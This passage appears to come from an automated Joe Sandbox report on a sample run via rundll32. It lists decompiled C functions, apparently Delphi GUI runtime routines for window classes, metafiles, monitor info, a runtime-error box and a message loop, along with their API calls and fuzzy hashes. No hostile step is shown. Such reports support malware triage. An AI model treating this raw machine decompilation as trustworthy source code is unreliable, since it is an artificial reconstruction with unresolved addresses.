                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                          • String ID:
                          • API String ID: 351091851-3916222277
                          • Opcode ID: 138f2a22f4273bff633cea87e6df589a38215760418d2264427921555f96d28c
                          • Instruction ID: 8b551b2b3cd4a7d5b9fd3310254429a46a850f8a09527eb18cf61a61c98345d5
                          • Opcode Fuzzy Hash: 138f2a22f4273bff633cea87e6df589a38215760418d2264427921555f96d28c
                          • Instruction Fuzzy Hash: 92510975A0062A9BCB26DF58CC84BD9B3BDAF4C310F4441D5E50AE7611D731AF858F62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E02830F34(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                          				char _v68;
                          				struct _WNDCLASSA _v108;
                          				intOrPtr _v116;
                          				signed char _v137;
                          				void* _v144;
                          				struct _WNDCLASSA _v184;
                          				char _v188;
                          				char _v192;
                          				char _v196;
                          				int _t52;
                          				void* _t53;
                          				intOrPtr _t86;
                          				intOrPtr _t104;
                          				intOrPtr _t108;
                          				void* _t109;
                          				intOrPtr* _t111;
                          				void* _t115;
                          
                          				_t109 = __edi;
                          				_t94 = __ebx;
                          				_push(__ebx);
                          				_v196 = 0;
                          				_t111 = __eax;
                          				_push(_t115);
                          				_push(0x28310f5);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t115 + 0xffffff40;
                          				_t95 =  *__eax;
                          				 *((intOrPtr*)( *__eax + 0x98))();
                          				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                          					L7:
                          					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                          					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                          					asm("sbb eax, eax");
                          					_t53 = _t52 + 1;
                          					if(_t53 == 0 || E0282A4C4 != _v184.lpfnWndProc) {
                          						if(_t53 != 0) {
                          							UnregisterClassA( &_v68, _v108.hInstance);
                          						}
                          						_v108.lpfnWndProc = E0282A4C4;
                          						_v108.lpszClassName =  &_v68;
                          						if(RegisterClassA( &_v108) == 0) {
                          							E027DD158(_t94, _t95, _t109, _t111);
                          						}
                          					}
                          					 *0x2863ebc = _t111;
                          					_t96 =  *_t111;
                          					 *((intOrPtr*)( *_t111 + 0x9c))();
                          					if( *(_t111 + 0x180) == 0) {
                          						E027DD158(_t94, _t96, _t109, _t111);
                          					}
                          					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                          						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                          					}
                          					E027D8DD4( *((intOrPtr*)(_t111 + 0x64)));
                          					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                          					E02834260(_t111);
                          					E0282E93C(_t111, E027F74EC( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
                          					_t130 =  *((char*)(_t111 + 0x5c));
                          					if( *((char*)(_t111 + 0x5c)) != 0) {
                          						E027D3408(_t111, _t130);
                          					}
                          					_pop(_t104);
                          					 *[fs:eax] = _t104;
                          					_push(0x28310fc);
                          					return E027D40E8( &_v196);
                          				} else {
                          					_t94 =  *((intOrPtr*)(__eax + 4));
                          					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                          						L6:
                          						_v192 =  *((intOrPtr*)(_t111 + 8));
                          						_v188 = 0xb;
                          						_t86 =  *0x286462c; // 0x27f53ec
                          						E027D6018(_t86,  &_v196);
                          						_t95 = _v196;
                          						E027DBC00(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                          						E027D3A9C();
                          					} else {
                          						_t108 =  *0x282964c; // 0x2829698
                          						if(E027D3398(_t94, _t108) == 0) {
                          							goto L6;
                          						}
                          						_v116 = E02833F7C(_t94);
                          					}
                          					goto L7;
                          				}
                          			}

                          APIs
                          • GetClassInfoA.USER32(?,?,?), ref: 02830FF8
                          • UnregisterClassA.USER32(?,?), ref: 02831020
                          • RegisterClassA.USER32(?), ref: 02831036
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 02831072
                          • GetWindowLongA.USER32(00000000,000000F4), ref: 02831087
                          • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0283109A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClassLongWindow$InfoRegisterUnregister
                          • String ID: @
                          • API String ID: 717780171-2766056989
                          • Opcode ID: 9da89e79fed5b119258288c49a0ca9a09ab97d0d6dab315fb246bc3b93eb2126
                          • Instruction ID: 881e4057c357cc21b2990ea06ba2f284613a5718724b148f512b67f63b729091
                          • Opcode Fuzzy Hash: 9da89e79fed5b119258288c49a0ca9a09ab97d0d6dab315fb246bc3b93eb2126
                          • Instruction Fuzzy Hash: CD51B878A003589BDB22DB68CC48B9E73FABF04704F504569E84DE7291DB34E949CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetActiveWindow.USER32 ref: 0281E75F
                          • GetWindowRect.USER32(?,?), ref: 0281E7B9
                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0281E7EF
                          • MessageBoxA.USER32(?,?,?,?), ref: 0281E83A
                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0281E8AE,?,00000000,0281E8A7), ref: 0281E888
                          • SetActiveWindow.USER32(?,0281E8AE,?,00000000,0281E8A7), ref: 0281E899
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Active$MessageRect
                          • String ID: (
                          • API String ID: 3147912190-3887548279
                          • Opcode ID: cb610ca5194e1cac3c4206ab678661b0197a1560996e632733a554a678324cc8
                          • Instruction ID: 1d41a16d9eb4beb403a37953cd753292d3bc37abccbc9698d2122d367c7d938e
                          • Opcode Fuzzy Hash: cb610ca5194e1cac3c4206ab678661b0197a1560996e632733a554a678324cc8
                          • Instruction Fuzzy Hash: 684172BAE10208AFDB51DFE8D985FAEB7F9BB08700F544495E614EB291D774EA018F10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E027FACB8(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				int _v12;
                          				BYTE* _v16;
                          				intOrPtr _v18;
                          				signed int _v24;
                          				short _v26;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				char _v38;
                          				struct tagMETAFILEPICT _v54;
                          				intOrPtr _v118;
                          				intOrPtr _v122;
                          				struct tagENHMETAHEADER _v154;
                          				intOrPtr _t103;
                          				intOrPtr _t115;
                          				struct HENHMETAFILE__* _t119;
                          				struct HENHMETAFILE__* _t120;
                          				void* _t122;
                          				void* _t123;
                          				void* _t124;
                          				void* _t125;
                          				intOrPtr _t126;
                          
                          				_t124 = _t125;
                          				_t126 = _t125 + 0xffffff68;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t122 = __eax;
                          				E027FAB54(__eax);
                          				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                          				if(_v38 != 0x9ac6cdd7 || E027F962C( &_v38) != _v18) {
                          					E027F87DC();
                          				}
                          				_v12 = _v12 - 0x16;
                          				_v16 = E027D277C(_v12);
                          				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                          				 *[fs:eax] = _t126;
                          				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x27fae27, _t124);
                          				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                          				if(_v24 == 0) {
                          					_v24 = 0x60;
                          				}
                          				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                          				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                          				_v54.mm = 8;
                          				_v54.xExt = 0;
                          				_v54.yExt = 0;
                          				_v54.hMF = 0;
                          				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                          				 *(_t103 + 8) = _t119;
                          				if(_t119 == 0) {
                          					E027F87DC();
                          				}
                          				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                          				_v54.mm = 8;
                          				_v54.xExt = _v122;
                          				_v54.yExt = _v118;
                          				_v54.hMF = 0;
                          				DeleteEnhMetaFile( *(_t103 + 8));
                          				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                          				 *(_t103 + 8) = _t120;
                          				if(_t120 == 0) {
                          					E027F87DC();
                          				}
                          				 *((char*)(_t122 + 0x2c)) = 0;
                          				_pop(_t115);
                          				 *[fs:eax] = _t115;
                          				_push(0x27fae2e);
                          				return E027D279C(_v16);
                          			}

                          APIs
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 027FAD5A
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 027FAD77
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 027FADA3
                          • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 027FADC3
                          • DeleteEnhMetaFile.GDI32(00000016), ref: 027FADE4
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 027FADF7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileMeta$Bits$DeleteHeader
                          • String ID: `
                          • API String ID: 1990453761-2679148245
                          • Opcode ID: d7169d68eef5a2718f412e712cccb04a99d0dc05f120a5255076bbfa807c02e7
                          • Instruction ID: 6b577abfbc8c02b2ba3892a74ad88c8f48ddbc89de456e767a332d5adbc9c304
                          • Opcode Fuzzy Hash: d7169d68eef5a2718f412e712cccb04a99d0dc05f120a5255076bbfa807c02e7
                          • Instruction Fuzzy Hash: CB41F7B5E04209AFDB51DFA8C884AAEB7F9EF48710F108069E948EB344E7359D41CF65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E027F4F04(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				struct HMONITOR__* _t27;
                          				struct tagMONITORINFO* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0x28658bc != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						_t29->rcMonitor.left = 0;
                          						_t29->rcMonitor.top = 0;
                          						_t29->rcMonitor.right = GetSystemMetrics(0);
                          						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L027D675C();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					 *0x28658a0 = E027F4BD4(4, _t23,  *0x28658a0, _t27, _t29);
                          					_t24 = GetMonitorInfoA(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          APIs
                          • GetMonitorInfoA.USER32(?,?), ref: 027F4F35
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 027F4F5C
                          • GetSystemMetrics.USER32(00000000), ref: 027F4F71
                          • GetSystemMetrics.USER32(00000001), ref: 027F4F7C
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 027F4FA6
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfo
                          • API String ID: 1539801207-1633989206
                          • Opcode ID: f4b51762568111993b97dfca8c332128a57216f438a6e81dbd40fea398e965db
                          • Instruction ID: 2c8a76e516d4eb9341b5769615b92155257635443eb929d42b83f7bd77da5880
                          • Opcode Fuzzy Hash: f4b51762568111993b97dfca8c332128a57216f438a6e81dbd40fea398e965db
                          • Instruction Fuzzy Hash: EB110036A083049FE760DF649848BA7B7EAFF06318F855929EF1987780D370A410CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E027D3F6C(void* __ecx) {
                          				long _v4;
                          				int _t3;
                          
                          				if( *0x286504c == 0) {
                          					if( *0x2863030 == 0) {
                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                          					}
                          					return _t3;
                          				} else {
                          					if( *0x2865220 == 0xd7b2 &&  *0x2865228 > 0) {
                          						 *0x2865238();
                          					}
                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                          					return WriteFile(GetStdHandle(0xfffffff5), E027D3FF4, 2,  &_v4, 0);
                          				}
                          			}

                          APIs
                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?,02865638,?,?,028630BC,027D639D,02862358), ref: 027D3FA5
                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?,02865638,?,?,028630BC,027D639D,02862358), ref: 027D3FAB
                          • GetStdHandle.KERNEL32(000000F5,027D3FF4,00000002,02862358,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?,02865638), ref: 027D3FC0
                          • WriteFile.KERNEL32(00000000,000000F5,027D3FF4,00000002,02862358,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,02862358,00000000,?,027D403A,?,?), ref: 027D3FC6
                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027D3FE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileHandleWrite$Message
                          • String ID: Error$Runtime error at 00000000
                          • API String ID: 1570097196-2970929446
                          • Opcode ID: 210c586f3da3f1efcc31b6716cee4bdfe1e33d765271e2f8f5c56de408032f00
                          • Instruction ID: cdd8d9d6228aa2b114e01623d4c6a4c42800af39a683797eb9290d866154ec93
                          • Opcode Fuzzy Hash: 210c586f3da3f1efcc31b6716cee4bdfe1e33d765271e2f8f5c56de408032f00
                          • Instruction Fuzzy Hash: 65F06D6DE8438479FA21A2549C0EFAA26385706F14F944A94F269E81C5C7A890888E63
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E02848330(intOrPtr* __eax, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				char _v40;
                          				void* __ebx;
                          				void* __ebp;
                          				int _t85;
                          				signed int _t86;
                          				signed int _t99;
                          				signed int _t109;
                          				intOrPtr _t112;
                          				signed int _t127;
                          				signed int _t132;
                          				signed int _t141;
                          				intOrPtr* _t145;
                          				MSG* _t152;
                          				intOrPtr _t170;
                          				intOrPtr _t171;
                          				intOrPtr* _t181;
                          				signed int _t183;
                          				intOrPtr* _t184;
                          				intOrPtr* _t187;
                          				void* _t190;
                          				void* _t191;
                          				void* _t193;
                          				void* _t195;
                          				intOrPtr _t196;
                          
                          				_t191 = __esi;
                          				_t190 = __edi;
                          				_t193 = _t195;
                          				_t196 = _t195 + 0xffffffdc;
                          				_v8 = __eax;
                          				_t152 =  &_v40;
                          				_v12 = 0;
                          				if( *((char*)(_v8 + 0x296)) != 0) {
                          					L52:
                          					return _v12;
                          				} else {
                          					 *((intOrPtr*)( *_v8 + 0x16c))();
                          					_push(_t193);
                          					_push(0x2848612);
                          					_push( *[fs:ecx]);
                          					 *[fs:ecx] = _t196;
                          					do {
                          						if(PeekMessageA(_t152, 0, 0, 0, 1) == 0) {
                          							E02849184(_v8, _t152, _t152, _t190, _t191, __eflags);
                          							goto L50;
                          						} else {
                          							if(_t152->message != 0x7b) {
                          								L5:
                          								if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                          									L7:
                          									if(E02847B20(_v8, _t152) == 0) {
                          										_t85 = _t152->message;
                          										__eflags = _t85 - 0x200;
                          										if(_t85 >= 0x200) {
                          											__eflags = _t85 - 0xb402;
                          											if(__eflags > 0) {
                          												_t86 = _t85 - 0xb403;
                          												__eflags = _t86;
                          												if(_t86 == 0) {
                          													 *((intOrPtr*)(_v8 + 0x2f4)) =  *((intOrPtr*)( *_v8 + 0x150))();
                          												} else {
                          													__eflags = _t86 == 1;
                          													if(_t86 == 1) {
                          														 *((intOrPtr*)(_v8 + 0x2f4)) =  *((intOrPtr*)( *_v8 + 0x154))();
                          													} else {
                          														goto L47;
                          													}
                          												}
                          											} else {
                          												if(__eflags == 0) {
                          													E028477C4(_v8, _t152->lParam);
                          												} else {
                          													_t99 = _t85 + 0xfffffe00 - 0xb;
                          													__eflags = _t99;
                          													if(_t99 < 0) {
                          														 *((intOrPtr*)( *_v8 + 0x178))();
                          													} else {
                          														__eflags = _t99 == 0xae16;
                          														if(_t99 == 0xae16) {
                          															goto L26;
                          														} else {
                          															goto L47;
                          														}
                          													}
                          												}
                          											}
                          											goto L48;
                          										} else {
                          											__eflags = _t85 - 0xa4;
                          											if(__eflags > 0) {
                          												_t109 = _t85 - 0xa7;
                          												__eflags = _t109;
                          												if(_t109 == 0) {
                          													goto L26;
                          												} else {
                          													__eflags = _t109 + 0xffffffa7 - 9;
                          													if(_t109 + 0xffffffa7 - 9 < 0) {
                          														__eflags = _t152->wParam - 0x70;
                          														if(_t152->wParam != 0x70) {
                          															L37:
                          															_t112 = _v8;
                          															__eflags =  *((char*)(_t112 + 0x248));
                          															if( *((char*)(_t112 + 0x248)) == 0) {
                          																 *((intOrPtr*)( *_v8 + 0x138))();
                          															}
                          															__eflags = _t152->message - 0x104;
                          															if(_t152->message != 0x104) {
                          																L42:
                          																 *((intOrPtr*)( *((intOrPtr*)(E02846B54( *((intOrPtr*)(_v8 + 0x2b0))))) - 0x14))();
                          															} else {
                          																__eflags = _t152->wParam - 0x12;
                          																if(_t152->wParam != 0x12) {
                          																	goto L42;
                          																} else {
                          																	 *((intOrPtr*)( *_v8 + 0x17c))();
                          																	 *((char*)(_v8 + 0x28a)) = 1;
                          																	TranslateMessage(_t152);
                          																	DispatchMessageA(_t152);
                          																}
                          															}
                          															goto L48;
                          														} else {
                          															_t127 = E02847FC4(E02846B54( *((intOrPtr*)(_v8 + 0x2b0))));
                          															__eflags = _t127;
                          															if(_t127 == 0) {
                          																goto L37;
                          															} else {
                          																_t132 =  *(E02847FC4(E02846B54( *((intOrPtr*)(_v8 + 0x2b0)))) + 0x64);
                          																_t181 =  *0x2864774; // 0x2865b5c
                          																_t27 =  *_t181 + 0x6c; // 0x0
                          																_t183 =  *_t27;
                          																__eflags = _t183;
                          																if(_t183 != 0) {
                          																	__eflags = _t132;
                          																	if(_t132 == 0) {
                          																		_t132 =  *(_t183 + 0x158);
                          																	}
                          																	__eflags =  *(_t183 + 0x228) & 0x00000008;
                          																	if(( *(_t183 + 0x228) & 0x00000008) == 0) {
                          																		_t184 =  *0x28645d4; // 0x2865b58
                          																		E0281EBC0( *_t184, _t152, _t132);
                          																	} else {
                          																		_t187 =  *0x28645d4; // 0x2865b58
                          																		E0281EC38( *_t187, _t132, 8);
                          																	}
                          																	E027D3B48();
                          																} else {
                          																	E027D3B48();
                          																}
                          																goto L52;
                          															}
                          														}
                          													} else {
                          														goto L47;
                          													}
                          												}
                          											} else {
                          												if(__eflags == 0) {
                          													L26:
                          													 *((intOrPtr*)( *_v8 + 0x17c))();
                          													E0284934C( *((intOrPtr*)(_v8 + 0x2c4)));
                          													DispatchMessageA(_t152);
                          												} else {
                          													_t141 = _t85 - 0x10;
                          													__eflags = _t141;
                          													if(_t141 == 0) {
                          														goto L26;
                          													} else {
                          														__eflags = _t141 == 0x91;
                          														if(_t141 == 0x91) {
                          															goto L26;
                          														} else {
                          															L47:
                          															TranslateMessage(_t152);
                          															DispatchMessageA(_t152);
                          														}
                          													}
                          												}
                          												L48:
                          												E0284735C(_v8);
                          												goto L50;
                          											}
                          										}
                          									} else {
                          										TranslateMessage(_t152);
                          										DispatchMessageA(_t152);
                          										goto L50;
                          									}
                          								} else {
                          									_t145 =  *0x28645d4; // 0x2865b58
                          									if(E0281E2A4( *_t145, _t152) != 0) {
                          										goto L50;
                          									} else {
                          										goto L7;
                          									}
                          								}
                          							} else {
                          								_t170 =  *0x2845dfc; // 0x2845e48
                          								if(E027D3398( *((intOrPtr*)(_v8 + 0x2c4)), _t170) != 0) {
                          									goto L50;
                          								} else {
                          									goto L5;
                          								}
                          							}
                          						}
                          						goto L53;
                          						L50:
                          					} while ( *((char*)(_v8 + 0x296)) != 0);
                          					_pop(_t171);
                          					 *[fs:eax] = _t171;
                          					return  *((intOrPtr*)( *_v8 + 0x158))(0x2848619);
                          				}
                          				L53:
                          			}

                          APIs
                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 02848374
                          • TranslateMessage.USER32(?), ref: 028483D1
                          • DispatchMessageA.USER32(?), ref: 028483D7
                          • DispatchMessageA.USER32(?), ref: 02848471
                          • TranslateMessage.USER32(?), ref: 028485CA
                          • DispatchMessageA.USER32(?), ref: 028485D0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Message$Dispatch$Translate$Peek
                          • String ID:
                          • API String ID: 1308778987-0
                          • Opcode ID: 1d5e9bfeeaedc075ee8cc3e9b1f4ed8a5e8b35fe6ddbedcca62e97f9b9f9065d
                          • Instruction ID: 56390d4a960285c62c2c1575c4aab564f9839f2c8a36c6c3a514c811bb3b0229
                          • Opcode Fuzzy Hash: 1d5e9bfeeaedc075ee8cc3e9b1f4ed8a5e8b35fe6ddbedcca62e97f9b9f9065d
                          • Instruction Fuzzy Hash: 9F812A3C604109DFDB11EF68C988AAEB7F6AF45308F6585A5E809DB296CF30DE41DB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 55%
                          			E02820A7C(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				char _v28;
                          				char _v44;
                          				void* __edi;
                          				void* __ebp;
                          				void* _t46;
                          				void* _t57;
                          				int _t85;
                          				void* _t119;
                          				void* _t120;
                          				void* _t129;
                          				struct HDC__* _t138;
                          				struct HDC__* _t139;
                          				int _t140;
                          				void* _t141;
                          
                          				_t121 = __ecx;
                          				_t137 = __ecx;
                          				_v8 = __edx;
                          				_t120 = __eax;
                          				_t46 = E028201D8(__eax);
                          				if(_t46 != 0) {
                          					_t144 = _a4;
                          					if(_a4 == 0) {
                          						__eflags =  *(_t120 + 0x54);
                          						if( *(_t120 + 0x54) == 0) {
                          							_t140 = E027FC2CC(1);
                          							 *(_t120 + 0x54) = _t140;
                          							E027FD6F0(_t140, 1);
                          							 *((intOrPtr*)( *_t140 + 0x40))();
                          							_t121 =  *_t140;
                          							 *((intOrPtr*)( *_t140 + 0x34))();
                          						}
                          						E027F7CA4( *((intOrPtr*)(E027FC894( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
                          						E027E9BA4(0,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
                          						_push( &_v44);
                          						_t57 = E027FC894( *(_t120 + 0x54));
                          						_pop(_t129);
                          						E027F80D8(_t57, _t129);
                          						_push(0);
                          						_push(0);
                          						_push(0xffffffff);
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						_push(E027F84EC(E027FC894( *(_t120 + 0x54))));
                          						_push(_v8);
                          						_push(E028203AC(_t120));
                          						L027FEF0C();
                          						E027E9BA4(_a16, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
                          						_v12 = E027F84EC(E027FC894( *(_t120 + 0x54)));
                          						E027F7CA4( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
                          						_t138 = E027F84EC(_t137);
                          						SetTextColor(_t138, 0xffffff);
                          						SetBkColor(_t138, 0);
                          						_t85 = _a16 + 1;
                          						__eflags = _t85;
                          						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                          						E027F7CA4( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
                          						_t139 = E027F84EC(_t137);
                          						SetTextColor(_t139, 0xffffff);
                          						SetBkColor(_t139, 0);
                          						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                          					}
                          					_push(_a8);
                          					_push(E0281FFD4(_t144));
                          					E02820A54(_t120, _t144);
                          					_push(E0281FFD4(_t144));
                          					_push(0);
                          					_push(0);
                          					_push(_a12);
                          					_push(_a16);
                          					_push(E027F84EC(__ecx));
                          					_push(_v8);
                          					_t119 = E028203AC(_t120);
                          					_push(_t119);
                          					L027FEF0C();
                          					return _t119;
                          				}
                          				return _t46;
                          			}

                          APIs
                          • 744713C0.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 02820ADB
                          • 744713C0.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 02820B7C
                          • SetTextColor.GDI32(00000000,00FFFFFF), ref: 02820BC9
                          • SetBkColor.GDI32(00000000,00000000), ref: 02820BD1
                          • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 02820BF6
                            • Part of subcall function 02820A54: 74471240.COMCTL32(00000000,?,02820AB5,00000000,?), ref: 02820A6A
                          Memory Dump Source
